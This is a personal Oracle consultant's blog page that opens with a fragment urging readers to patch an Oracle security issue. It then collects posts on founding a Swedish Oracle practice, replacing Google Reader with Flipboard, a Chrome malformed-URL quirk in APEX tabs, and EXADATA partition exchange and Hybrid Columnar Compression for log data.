This is scary stuff and this only goes to show that even a mature product needs to be kept up with current patches. If you are not on a CPU from this year, PLEASE give it a high priority to make it happen today.

And PLEASE do not test this in production. If you do and your DBA catches you, he will lecture you forever if not reporting you up the chain of command. But please do spread the word that this issue exists and needs to be plugged ASAP.


It’s a Miracle

Thu, 2013-12-05 14:20

Time to get back into blogging. I stopped a while ago and the reason was two-fold. As I was leaving my job at Kentor AB I wanted to avoid any concerns with what I wrote while my three month long two week notice played out. The other reason was that once I had left life got really busy both with work for my client as well as with the new adventure I had departed on.

The new adventure is to bring the Miracle brand to Sweden. I will try to build up an Oracle database focused team here in Stockholm based on the success Miracle A/S has had in Denmark. Yes it is equally exciting as it is scary for someone who has lived their life in medium to large scale consulting practices.

However, I have always had a big admiration for the guys who started Miracle and what they have achieved. Getting a chance to bring the same style and quality to my home market of Stockolm and Sweden was just an offer that was too good to pass up. That is the kind of opportunities most of us will only get once or twice in a career. This one came at a time where it was close enough to work with everything else that was going on. The one thing that may not be optimal is having a new house built at the same time. Actually, that makes it completely not optimal. But the phrase I keep repeating to others that are thinking about when the best time to get started is “There is no time such as the present”, so I took my own advice for once.

So now the work is on getting the Oracle practice going, or rather it is going it just needs a few more legs. And with legs I mean consultants.

Next is however partying with our colleagues down in Copenhagen close to the headquarters. Tomorrow evening is when the Christmas party kicks off. Who knows when it will end. :-)

This blog will soon return to a more technical program. thought probably with some posts on interesting things with starting up a company. I’m sure the next year will teach us a lot of things on how to do that.

About that, this hiring business… When is the best time to add more people to a small company and how do we manage risk? Well… ehhh… Yeah… That’s right there is no best time, but there is no time such as the present.


Google reader is dead, long live RSS

Tue, 2013-06-25 04:00

So calling Google Reader dead may be a bit premature, but Googles announcement of their intention to kill their baby all but killed it. On monday it is RIP for the reader. I’ve gone through disbelief to mourning the loss to a search for a replacement that best emulates what Google Reader does.

In the end I decided to not just find something that just replaces it with a new tool providing the same exact feature only with a different name.

If I had to find a different tool, I might as well try to find something better. The fact is that although Google Reader was one of my favorite Google tools, I did not use it. Yes, it is a bit odd that I’m writing a post about replacing a tool I didn’t use. And when I say that I didn’t use it, I use the term “did not” very recklessly. The fact is that I could not read all the blog I follow without it. Google Reader had however turned into an infrastructure piece for me. I used it to collect the posts and keep track of what I had read, but the tool of my choice for reading was the Reeder. Unless you are familiar with it, it may seem like I just referred to the Google Reader again, but it is spelled differently and this is a wonderful tool for reading blogs and it uses the Google Reader to manage the blogs and lets Google Reader track which posts are read and which are not.

If the Reeder is such a wonderful app, why not keep using it. At first I thought of abandoning it as Google Reader was going away. But it turns out the Reeder will continue to work (or so they claim). It supports Feedbin and possibly even feedly in the future. There has not been much talk about it on their own website or even on their twitter account. There are lots of fans asking what is going on, scarcely little from @reederapp themselves.

I started thinking of how I consume text these days. I do still surf on a computer, but it is when looking for something. I prefer reading on my iPad. My workflow has actually changed such that when I find a great article or blog post, I flip it so I later can read it in Flipboard on the iPad. If the article is worth saving for the future after having read it I add it to Evernote. As that is my workflow for things I do not have to read right now, why should my workflow for reading blogs be any different? After all, I read them when time allows.

After that epiphany I took a look at Flipboard wondering if I could get a similar tool for reading blogs on the iPad. It turns out I can, they have ceased the opportunity Google created. You can now read your blogs in the tool we all love. Getting my blogs to Flipboard has made them seem so much more enjoyable. It integrates with Google Reader so it imports all the blogs you have there and lets you follow the same blogs.

The one thing that can be confusing is that after opting to read your blogs in flipboard, you will want to go into the settings for Google Reader in Flipboard and possibly turn on to have number of unread items indicated, to set posts you read in Flipboard to read and to show only unread posts. I have them all set to ON and it works very well with the way I want to read my blogs.

For me reading blogs on the iPad is so much more enjoyable than to try to catch up in the browser on the computer. The latter never happens  and I tend to fall far behind and have to set aside a few hours to catch up, since moving my blog reading to Flipboard I have stayed current on all blogs I read.

If you haven’t found a way to read your blogs yet that you really love, give Flipboard a try. I think you’re gonna love it.


Too much chrome

Wed, 2013-06-19 07:00

You know how it is, when you have that feeling. You are on top of your game. You have a few quick brush strokes to add to a system to make it more dynamic. You have all the small needed changes in your head and you know it is just gonna work. You sit down for some quality time with your computer and with the application builder. It’s gonna be fun and you will get to bask in the glow of your success before the day is over. yup, that is the feeling I’m talking about.

Then there is that other feeling, then one we want to avoid. You know the kind. When you have an easy fix to do. It all goes well until it doesn’t. And then, nothing. You turn the know this way, nothing. You turn the know that way, nothing. You turn it up, you turn it down. No matter what. The same freaking result. And it is the wrong result. Time goes by, what was embarrassing after 15 minutes is annoyingly embarrassing after a couple of hours. Yes, that is the feeling I’m referring to.

Worst of all is of course when the first feeling turns into the second feeling. That is an afternoon that is sure to suck, and the more it sucks the more you get annoyed that you cannot see what is sure to be a very obvious mistake.

A day a few weeks ago I had this happen to me for the umpteenth time. Not with the same issue of course, but with one of those ridiculous things that just throws you out of your flow. What was a magical afternoon changed to one where I felt like a complete beginner.

It all started very innocent with me needing to add a table where I could store the location of different places a tab should point to. So I had an application item, I had a process that would populate it on new instances(sessions) and I had referenced that application item in the link target. The target returned was set to be “127.0.0.1:8080”. A target as good as any…

It didn’t show up in the link from the tab. It however was available so it could be displayed on a region on the same page. What the ….

Could it really be that APEX creates the HTML text for the tab before the application processes runs? It just doesn’t make sense, a test of hard coding the value to “abc” in the application process proved that it in fact ran before.

Could it be that a value passed in from the process was treated differently for tabs or application processes? I doubted it, but facing odd issues one tends to consider all kinds of illogical things. But hardcoding “abc” in the process once again showed that it came through to the tab.

What on earth. A friend tested the same page on his Mac and (fortunately?) got the same exact result. So it wasn’t my browser that was acting up.

Now we were really stretching and started looking at the page rendered in Safari and Firefox. What on earth, the link shows up just fine in them?

We’re considering a bug in APEX. I have read about things they have had to do to make IE, Chrome, Firefox, Safari, and Opera work well with APEX applications. Could there be a bug in there with how links with dynamic values were treated? It certainly was possible. If it wasn’t for the fact that some links showed up just fine, the “abc” one looked like a page on the same ip-address as the APEX server when looking at where Chrome wanted to send us. So it really wasn’t reasonable that APEX would have a bug related just to localhost adresses.

After some more coffe it dawned on me, maybe this wasn’t APEX at all. Maybe this was a “feature” of Chrome. After a peek in the source for the rendered page, the text “127.0.0.1:8080” was found in the link attribute for the tab. So APEX renders it like I expected, but Chrome didn’t honor it as a link.

It turns out that if there’s just text, then Chrome will assume it is a relative document located downstream from the DocumentRoot. However, if it is not a path that can be parsed as file system location, then Chrome will not allow the link to be used. What was needed was to put http:// in front of the address. That should of course be there to be a well formed URL. I just expected it to show up when hovering over the link anyway just as it does in other browsers.

It would be nice if Chrome rather than just linking to “blank” would link to a page somewhere that just said that it was a malformed URL. However, the solution took seconds to implement while the troubleshooting took WAY longer than it should have. Even worse two senior troubleshooters was stumped on this for a very long time.

So if you end up with an empty link in your APEX application, or any other web page for that matter, you know that it is most likely the result of having a malformed URL rendered in Chrome.

So yes I started of with the first feeling and feeling good about myself, quickly started the downward spiral of the second feeling. That day never really got back up to the first happy feeling again. Happy with having solved the issue, but not nearly feeling on top of my game when the day ended. Oh well, there will be more days to convince myself that I might be on top of my game (at least sometimes).


Improving data move on EXADATA V

Wed, 2013-06-12 07:00

Wrap-up

This is the last post in this series and I’ll not introduce anything new here, but rather just summarise the changes explained and talk a bit about the value the solution delivers to the organisation.

Let’s first review the situation we faced before implementing the changes.

The cost of writing the log-records to the database was that all the parallell writing from many different sources was such that it introduced severe bottlenecks to the point that the logging feature had to be turned off days at a time. This was not acceptable but rather than shutting down the whole system which would put lives in immediate danger, this was the only option available. Then even if that would have been fast enough, the moving of data was taking over twice the time available and it was fast approaching the point where data written in 24 hours would take more time to move to the historical store for log-data. That would of course have resulted in an ever growing backlog even if the data move was on 24×7. On top of that the data took up 1.5 TB of disk space, costing a lot of money and raising concerns with out ability to move it to EXADATA.

To resolve the issue during business hours of having contention causing a crippling impact on the overall system, we changed the table setup to not have any primary keys, no foreign keys and no indexes. We made the tables partitioned such that we get one partition per day.

To make the move from operational tables to historical tables faster, we opted to have both in the same instance on EXADATA. This allowed us to use partition exchange to swap out the partition from the operational table and swap it into the historical table. This took just a second as all we did was updating some metadata for which table the partition belongs to. Note that this ultra fast operation replaced a process that used to take around 16 hours, for which we had 6.5 and the time it took was expanding as business was growing.

Finally, to reduce the space consumed on disk we used HCC – Hybrid Columnar Compression. This is an EXADATA only feature for compressing data such that columns with repeating values gets a very good compression ratio. We went from 1.5 TB to just over 100 GB. This means that even with no purging of data it would take us over five years to even get back to the amount of storage this used to require.

So in summary

  • During business hours we use 20% of the computing power and even less of the wall clock time it used to take,
  • The time to move data to the historical store was reduced from around 16 hours to less than one second.
  • Disk space requirement was reduced from 1.5 TB to just over 100 GB.

And all of this was done without changing one line of code, in fact there was no rebuild, no configuration change or anything to allow this drastic improvement to work with all the different systems that was writing to these log-tables.

One more thing to point out here is that all these changes was done without using traditional SQL. The fact that it  is an RDBMS does not mean that we have to use SQL to resolve every problem. In fact, SQL is often not the best tool for the job. It is also worth to note that these kinds of optimisations cannot be done by an ORM, it is not what they do. This is what your performance or database architect needs to do for you.

For easy lookup, here are links to the posts in this series.

  1. Introduction
  2. Writing log records
  3. Moving to history tables
  4. Reducing storage requirements
  5. Wrap-up (this post)

Improving data move on EXADATA IV

Wed, 2013-06-05 07:00

Reducing storage requirements

In the last post in this series I talked about how we sped up the move of data from operational to historical tables from around 16 hours down to just seconds. You find that post here.

The last area of concern was the amount of storage this took and would take in the future. As it was currently taking 1.5 TB it would be a fairly large chunk of the available storage and that raised concerns for capacity planning and for availability of space on the EXADATA for other systems we had plans to move there.

We set out to see what we could do to both estimate max disk utilisation this disk space would reach as well as what we could do to minimize the needed disk space. There were two considerations  minimize disk utilisation at the same time as query time should not be worsened. Both these were of course to be achieved without adding a large load to the system, especially not during business hours.

The first attempt was to just compress one of the tables with the traditional table compression. After running the test across the set of tables we worked with, we noticed a compression ratio of 57%. Not bad, not bad at all. However, this was now to be using an EXADATA. One of the technologies that are EXADATA only (to be more technically correct, only available with Oracle branded storage) is HCC. HCC stands for Hybrid Columnar Compression. I will not explain how it is different from normal compression in this post, but as the name indicates the compression is based around columns rather than on rows as traditional compression is. This can achieve even better results, at least that is the theory and the marketing for EXADATA says that this is part of the magic sause of EXADATA. Time to take it out for a spin.

After having set it up for our tables having the same exact content as we had with the normal compression, we had a compression rate of 90%. That is 90% of the needed storage was reduced by using HCC. I tested the different options available for the compression (query high and low as well as archive high and low), and ended up choosing query high. My reasoning there was that the compression rate of query high over query low was improved enough and the processing power needed was well worth it. I got identical results on query high and archive low. It took the same time, resulted in the same size dataset and querying took the same time. I could not tell that they were different in any way. Archive high however  is a different beast. It took about four times the processing power to compress and querying too longer and used more resources too. As this is a dataset I expect the users to want to run more and more queries against when they see that it can be done in a matter of seconds, my choice was easy, query high was easily the best for us.

How do we implement it then? Setting a table to compress query high and then run normal inserts against it is not achieving a lot. There is some savings with it, but it is just marginal compared to what can be achieved. For HCC to kick in, we need direct path writes to occur. As this data is written once and never updated, we can get everything compressed once the processing day is over. Thus, we set up a job to run thirty minutes past midnight which compressed the previous days partition. This is just one line in the job that does the move of the partitions described in the last post in this series.

The compression of  one very active day takes less than two minutes. In fact, the whole job to move and compress has run in less than 15 seconds for each days compression since we took this solution live a while back. That is a time well worth the 90% saving in disk consumption we achieve.

It is worth to note that while HCC is an EXADATA feature not available in most Oracle databases, traditional compression is available. Some forms of it requires licensing, but it is available so while you may not get the same ratio as described in this post you can get a big reduction in disk space consumption using the compression method available to you.

With this part the last piece of the puzzle fell in place and there were no concerns left with the plan for fixing the issues the organisation had with managing this log data. The next post in this serie will summarise and wrap up what was achieved with the changes described in this serie.


Pages